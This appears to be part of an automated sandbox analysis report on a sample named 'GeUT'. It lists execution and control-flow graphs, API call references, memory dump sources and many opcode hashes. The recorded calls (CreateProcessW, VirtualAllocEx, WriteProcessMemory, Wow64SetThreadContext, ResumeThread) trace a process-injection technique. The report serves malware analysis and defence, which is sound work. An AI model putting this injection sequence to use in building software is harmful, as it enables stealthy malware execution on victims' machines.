                                • Instruction Fuzzy Hash: 1EE1A2B4D01228CFDB24DFA9D984B9DBBB2FF89301F1081A9D409A7355DB359A86CF50

                                Execution Graph

                                Execution Coverage:30.2%
                                Dynamic/Decrypted Code Coverage:100%
                                Signature Coverage:0%
                                Total number of Nodes:42
                                Total number of Limit Nodes:4
                                execution_graph 3938 5181fd8 ReadProcessMemory 3939 5182097 3938->3939 3940 5185f98 3941 5185fb2 3940->3941 3942 5186001 3941->3942 3944 5186450 3941->3944 3945 5186483 3944->3945 3948 5184024 3945->3948 3947 5186677 3947->3941 3949 5186eb0 CreateProcessW 3948->3949 3951 5187096 3949->3951 3956 5182338 ResumeThread 3957 51823c0 3956->3957 3958 51821f8 3959 5182261 3958->3959 3960 5182276 WriteProcessMemory 3958->3960 3959->3960 3961 51822d8 3960->3961 3981 5181ec8 3982 5181f3b Wow64SetThreadContext 3981->3982 3983 5181f26 3981->3983 3984 5181f84 3982->3984 3983->3982 3985 5181ba8 3986 5181c35 CreateProcessW 3985->3986 3988 5181d8e 3986->3988 3988->3988 3962 51871d0 3964 51871ea 3962->3964 3963 5187239 3964->3963 3967 5187288 3964->3967 3971 5187279 3964->3971 3969 51872bb 3967->3969 3975 518614c 3969->3975 3970 51874af 3970->3964 3973 5187288 3971->3973 3972 518614c CreateProcessW 3974 51874af 3972->3974 3973->3972 3974->3964 3976 5187ce8 CreateProcessW 3975->3976 3978 5187ece 3976->3978 3979 51820f0 VirtualAllocEx 3980 51821a7 3979->3980 3989 5184e40 3990 5184ecd CreateProcessW 3989->3990 3992 5185026 3990->3992

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 600 5185c6c-5185d03 601 5185d1a-5185d28 600->601 602 5185d05-5185d17 600->602 603 5185d2a-5185d3c 601->603 604 5185d3f-5185d7b 601->604 602->601 603->604 605 5185d7d-5185d8c 604->605 606 5185d8f-5185e5c CreateProcessW 604->606 605->606 610 5185e5e-5185e64 606->610 611 5185e65-5185f24 606->611 610->611 621 5185f5a-5185f65 611->621 622 5185f26-5185f4f 611->622 626 5185f66 621->626 622->621 626->626
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05185E49
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 682 5187cdc-5187d73 684 5187d8a-5187d98 682->684 685 5187d75-5187d87 682->685 686 5187d9a-5187dac 684->686 687 5187daf-5187deb 684->687 685->684 686->687 688 5187ded-5187dfc 687->688 689 5187dff-5187ecc CreateProcessW 687->689 688->689 693 5187ece-5187ed4 689->693 694 5187ed5-5187f94 689->694 693->694 704 5187fca-5187fd5 694->704 705 5187f96-5187fbf 694->705 708 5187fd6 704->708 705->704 708->708
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 05187EB9
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 573 5184e34-5184ecb 574 5184ecd-5184edf 573->574 575 5184ee2-5184ef0 573->575 574->575 576 5184ef2-5184f04 575->576 577 5184f07-5184f43 575->577 576->577 578 5184f45-5184f54 577->578 579 5184f57-5185024 CreateProcessW 577->579 578->579 583 518502d-51850ec 579->583 584 5185026-518502c 579->584 594 51850ee-5185117 583->594 595 5185122-518512d 583->595 584->583 594->595 599 518512e 595->599 599->599
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05185011
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 655 5186ea4-5186f3b 656 5186f3d-5186f4f 655->656 657 5186f52-5186f60 655->657 656->657 658 5186f62-5186f74 657->658 659 5186f77-5186fb3 657->659 658->659 660 5186fb5-5186fc4 659->660 661 5186fc7-5187094 CreateProcessW 659->661 660->661 665 518709d-518715c 661->665 666 5187096-518709c 661->666 676 518715e-5187187 665->676 677 5187192-518719d 665->677 666->665 676->677 681 518719e 677->681 681->681
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 05187081
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 627 518614c-5187d73 629 5187d8a-5187d98 627->629 630 5187d75-5187d87 627->630 631 5187d9a-5187dac 629->631 632 5187daf-5187deb 629->632 630->629 631->632 633 5187ded-5187dfc 632->633 634 5187dff-5187ecc CreateProcessW 632->634 633->634 638 5187ece-5187ed4 634->638 639 5187ed5-5187f94 634->639 638->639 649 5187fca-5187fd5 639->649 650 5187f96-5187fbf 639->650 653 5187fd6 649->653 650->649 653->653
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 05187EB9
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 545 5184024-5186f3b 547 5186f3d-5186f4f 545->547 548 5186f52-5186f60 545->548 547->548 549 5186f62-5186f74 548->549 550 5186f77-5186fb3 548->550 549->550 551 5186fb5-5186fc4 550->551 552 5186fc7-5187094 CreateProcessW 550->552 551->552 556 518709d-518715c 552->556 557 5187096-518709c 552->557 567 518715e-5187187 556->567 568 5187192-518719d 556->568 557->556 567->568 572 518719e 568->572 572->572
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 05187081
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 516 5181b9c-5181c33 519 5181c4a-5181c58 516->519 520 5181c35-5181c47 516->520 521 5181c5a-5181c6c 519->521 522 5181c6f-5181cab 519->522 520->519 521->522 523 5181cad-5181cbc 522->523 524 5181cbf-5181d8c CreateProcessW 522->524 523->524 528 5181d8e-5181d94 524->528 529 5181d95-5181e54 524->529 528->529 539 5181e8a-5181e95 529->539 540 5181e56-5181e7f 529->540 544 5181e96 539->544 540->539 544->544
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05181D79
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 764 5185c78-5185d03 765 5185d1a-5185d28 764->765 766 5185d05-5185d17 764->766 767 5185d2a-5185d3c 765->767 768 5185d3f-5185d7b 765->768 766->765 767->768 769 5185d7d-5185d8c 768->769 770 5185d8f-5185e5c CreateProcessW 768->770 769->770 774 5185e5e-5185e64 770->774 775 5185e65-5185f24 770->775 774->775 785 5185f5a-5185f65 775->785 786 5185f26-5185f4f 775->786 790 5185f66 785->790 786->785 790->790
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05185E49
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 737 5184e40-5184ecb 738 5184ecd-5184edf 737->738 739 5184ee2-5184ef0 737->739 738->739 740 5184ef2-5184f04 739->740 741 5184f07-5184f43 739->741 740->741 742 5184f45-5184f54 741->742 743 5184f57-5185024 CreateProcessW 741->743 742->743 747 518502d-51850ec 743->747 748 5185026-518502c 743->748 758 51850ee-5185117 747->758 759 5185122-518512d 747->759 748->747 758->759 763 518512e 759->763 763->763
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05185011
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 710 5181ba8-5181c33 711 5181c4a-5181c58 710->711 712 5181c35-5181c47 710->712 713 5181c5a-5181c6c 711->713 714 5181c6f-5181cab 711->714 712->711 713->714 715 5181cad-5181cbc 714->715 716 5181cbf-5181d8c CreateProcessW 714->716 715->716 720 5181d8e-5181d94 716->720 721 5181d95-5181e54 716->721 720->721 731 5181e8a-5181e95 721->731 732 5181e56-5181e7f 721->732 736 5181e96 731->736 732->731 736->736
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 05181D79
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 791 51821f0-518225f 792 5182261-5182273 791->792 793 5182276-51822d6 WriteProcessMemory 791->793 792->793 794 51822d8-51822de 793->794 795 51822df-518231d 793->795 794->795
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 051822C6
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 051822C6
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05182085
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05182085
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05182195
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 05181F72
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 051823AE
                                Memory Dump Source
                                • Source File: 00000007.00000002.1633311978.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_5180000_GeUT.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                Memory Dump Source
                                • Source File: 00000007.00000002.1631973706.00000000012DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012DD000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_7_2_12dd000_GeUT.jbxd
                                Memory Dump Source
                                • Source File: 00000008.00000002.1658970181.0000000003120000.00000040.00000800.00020000.00000000.sdmp, Offset: 03120000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_8_2_3120000_GeUT.jbxd
                                Memory Dump Source
                                • Source File: 00000009.00000002.1659393121.0000000001070000.00000040.00000800.00020000.00000000.sdmp, Offset: 01070000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_9_2_1070000_GeUT.jbxd
                                Memory Dump Source
                                • Source File: 0000000A.00000002.1660863124.0000000002C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_2c60000_GeUT.jbxd
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 38289add1a6834ebc44e68d2d37a1abbd9b07003553ef75d07716aa1a403f9e2
                                • Instruction ID: 41044fef5c48074997b06ceb7effc671f12a5a272d6f4090528cf25cec30f279
                                • Opcode Fuzzy Hash: 38289add1a6834ebc44e68d2d37a1abbd9b07003553ef75d07716aa1a403f9e2
                                • Instruction Fuzzy Hash: BE5171307003058FCB65BF74E46856E7FE6FB946167408669D406DB3AAEF389D04CB91
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ad901e7d185752e9b69d6fd1eaeb896f16a05b20c9a317a5e19642216f83039c
                                • Instruction ID: adf06ed72c28f1642ea919751ca1ec0103d70cd1bbee6ab406f87077c52e6f54
                                • Opcode Fuzzy Hash: ad901e7d185752e9b69d6fd1eaeb896f16a05b20c9a317a5e19642216f83039c
                                • Instruction Fuzzy Hash: A3514D307003058FCB65BF74E4A856E7FE6FB946167408A69D806DB3A9EF389D04CB81
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 68411865e3eb8c09cf11e283e6574af1cc48d203efaef27e4775270eb3573e5f
                                • Instruction ID: 35c3b43b98eb68461d72ee6ae96e006d52255ddb2572b26816cd88357490998c
                                • Opcode Fuzzy Hash: 68411865e3eb8c09cf11e283e6574af1cc48d203efaef27e4775270eb3573e5f
                                • Instruction Fuzzy Hash: 7131AD71340B018BDBA9AB79D42827E76E2BFC4565350CA6EC01BCB794DF319D049BD2
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ce4670024992b7fae2808fa41ce1c7de46fa3a6cf17e0807f72a33b9bf3f0875
                                • Instruction ID: 717286439f64e81c1be8cf1e74e68f86d17601fc2280a624403a5aa10d4c646c
                                • Opcode Fuzzy Hash: ce4670024992b7fae2808fa41ce1c7de46fa3a6cf17e0807f72a33b9bf3f0875
                                • Instruction Fuzzy Hash: C7217A74B401159FDB48DB79D858B6E7BF2FFC8710F244469E505EB3A5CA729C018B90
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2426e7899caedb40feabbcf8fd0b7583fc4c30b7c4f95c5ab603eb9ca03cea74
                                • Instruction ID: 029a6e3ddad89f04184853f1b68603df5495707b95f7ac1cfbded017d195ebd2
                                • Opcode Fuzzy Hash: 2426e7899caedb40feabbcf8fd0b7583fc4c30b7c4f95c5ab603eb9ca03cea74
                                • Instruction Fuzzy Hash: 481172B1B012059FDB58ABBE481836FBAEAEFD8651B24842ED40BD7394DE358C0157A1
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d99a42b82a166e9a08fd25f89fbd9710c2ffa04f5b83c8fcf38b04681461d494
                                • Instruction ID: 375be247960f48fef0e29fdee4bcfdae7797e1d91430258752e77eac77f145ab
                                • Opcode Fuzzy Hash: d99a42b82a166e9a08fd25f89fbd9710c2ffa04f5b83c8fcf38b04681461d494
                                • Instruction Fuzzy Hash: 49311C70A00319DFDB45EFB8D8946ADBFB6FF88202F108569D805A7354DB385A45CB51
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 53dd4c2d4a94010e7e5af6376a4aa7ee10a06e4c772c93d3047b9e51acbfa4f4
                                • Instruction ID: 5c3b5a816ad7e9a59d22725d3b2cb532c2c7ab2bed002fa5b316204b0f506cd5
                                • Opcode Fuzzy Hash: 53dd4c2d4a94010e7e5af6376a4aa7ee10a06e4c772c93d3047b9e51acbfa4f4
                                • Instruction Fuzzy Hash: 2A211D70900309DFDB45EFB8D8946ADBFB6FF88202F108569D805A7354DB785E45CB51
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c6db5a0e39ec8c8b087cf2d17703e1751af80a82565ec40c95c7d94a28fc9480
                                • Instruction ID: 6ea911c3a56ad5ab936c28e1eb0a5c1f4d335bff7e78b074450ffb98d91fa77f
                                • Opcode Fuzzy Hash: c6db5a0e39ec8c8b087cf2d17703e1751af80a82565ec40c95c7d94a28fc9480
                                • Instruction Fuzzy Hash: DB219A301053569FDB02EF28F8D0A957FA9FB8160771096B9D804AB22AD77C6D49CBC2
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 537bf121c816d245616a9b26ffb0f366bc2125e87825dba786850431544af1ef
                                • Instruction ID: a236e79a4278df9023504d2c57b45345a39a3194bca0843ca35534f3a51aa964
                                • Opcode Fuzzy Hash: 537bf121c816d245616a9b26ffb0f366bc2125e87825dba786850431544af1ef
                                • Instruction Fuzzy Hash: FC01C430B082448FDB49EBB894653AD3FE2EFD6200F1481AEC0459B2E6DF344D05D781
                                Memory Dump Source
                                • Source File: 0000000B.00000002.1663081271.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_11_2_2e60000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e5aa54ec6e71053830226c7518017a1702a0acc2021ecb82df0e2f595d53c41a
                                • Instruction ID: d162fc62a84a54db8a8130550ea1e7bd5b444ed61287e55db2b03ab7f5c8141e
                                • Opcode Fuzzy Hash: e5aa54ec6e71053830226c7518017a1702a0acc2021ecb82df0e2f595d53c41a
                                • Instruction Fuzzy Hash: E9115B7061131ADFDB01EF28F9C4A557FADF784607B1096B8D804AB229D77C6D498F82
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7e180cfad5bab3a4e59de838c8112a4a6ae0c654540c75aca74c143daee1a8e8
                                • Instruction ID: 1279af0e5abbf7d5275ffc2e8cc7562082ada6540cd1ced0c4a1e1d7d8916b20
                                • Opcode Fuzzy Hash: 7e180cfad5bab3a4e59de838c8112a4a6ae0c654540c75aca74c143daee1a8e8
                                • Instruction Fuzzy Hash: AE519F306053898FCB05FF75E89956E7BB2BF882023004A69E446DF365EF305D09DB82
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42f0ea3b4a493f8b8c971267ae6302abdcd46cb8d0bc2260b0cad72b1968d43c
                                • Instruction ID: ae29620562b04ee01952309aa354af0e360b5984d59dc491d6aa916eddc3884d
                                • Opcode Fuzzy Hash: 42f0ea3b4a493f8b8c971267ae6302abdcd46cb8d0bc2260b0cad72b1968d43c
                                • Instruction Fuzzy Hash: BC9180307043498FCB05AF75E899A6E7BB2BFC8201B104669E406EF3A5DF319D098B91
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 6dbfc706a2bc7baff441ae7e6cf80dd70c87618ddf96657195ec5e4d4399a5a9
                                • Instruction ID: 3d3656de78f1ed6b07fac9406b0caee70a97907af269a53c74061a09d820e0b9
                                • Opcode Fuzzy Hash: 6dbfc706a2bc7baff441ae7e6cf80dd70c87618ddf96657195ec5e4d4399a5a9
                                • Instruction Fuzzy Hash: 8931CF31700B498FCB58BB79986412E76E2BFC86553408A2ED01BDB790EF359E059BD2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 665fe7f622e2862c6b1af6320f3c4de7f9ff6c664f1398e1546a19b8a6fb2799
                                • Instruction ID: 69f00abbd7666be7568ed0626c91de3f1ff209ba8cf0fa4da262623a0823386e
                                • Opcode Fuzzy Hash: 665fe7f622e2862c6b1af6320f3c4de7f9ff6c664f1398e1546a19b8a6fb2799
                                • Instruction Fuzzy Hash: 3D31A0749053099FDB41FFB8D8926ADBBB2FF88301F10466AD401AB345EB305A95CB52
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ef988b60f54ea52fc8ea65b841e338c0197e40823233bffe448f6f09aec3ba1e
                                • Instruction ID: 4c6dbf7b770665e7e9c77ac7d6bb3d546e67b90801cd7ccd198c607839386396
                                • Opcode Fuzzy Hash: ef988b60f54ea52fc8ea65b841e338c0197e40823233bffe448f6f09aec3ba1e
                                • Instruction Fuzzy Hash: C721C371B002059FDB14EBBE481432FBAEAEFC8710B10842ED44BE7381DE358C0157A2
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1e6e6e37cb18536951637c2433ddcc4b9607c677220e99ebf71c5b62788e8372
                                • Instruction ID: 7b768310ea8518f41b80b84b9d8af85b20e43659b282c6411c36eb8e965c8dcd
                                • Opcode Fuzzy Hash: 1e6e6e37cb18536951637c2433ddcc4b9607c677220e99ebf71c5b62788e8372
                                • Instruction Fuzzy Hash: 2D21A374901309DFDB44FFB8D88269DBBB2FF88701F504629E401AB348EB305A95CB52
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 29db80b66bc021836cc2a3c6825c3fcb94b5a4a7feface9924c3be351c080f3a
                                • Instruction ID: d6552451487ed2174c830a28721b4b62bef648f9f04ce74ac9dd7dc55b0d682c
                                • Opcode Fuzzy Hash: 29db80b66bc021836cc2a3c6825c3fcb94b5a4a7feface9924c3be351c080f3a
                                • Instruction Fuzzy Hash: 52219230E052498FCB44EBB8D4657ADBBF1EF85310F2484AED409AB385DB354D15DB81
                                Memory Dump Source
                                • Source File: 0000000C.00000002.1662827978.0000000000F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_12_2_f30000_GeUT.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2c7d2b62b1ed6cde30bc46cbf813af781df1c407a805fa809a5815e136ff384b
                                • Instruction ID: 7da2c1df04d1acf43688f56ffd7995ea3cafe85cdf493ccf6504151b70ac501f
                                • Opcode Fuzzy Hash: 2c7d2b62b1ed6cde30bc46cbf813af781df1c407a805fa809a5815e136ff384b
                                • Instruction Fuzzy Hash: 9521313411E3568FDB02FF28F8D2A457B71BB81A067044AA5D4488F56ED7706DA9CB82
                                Memory Dump Source
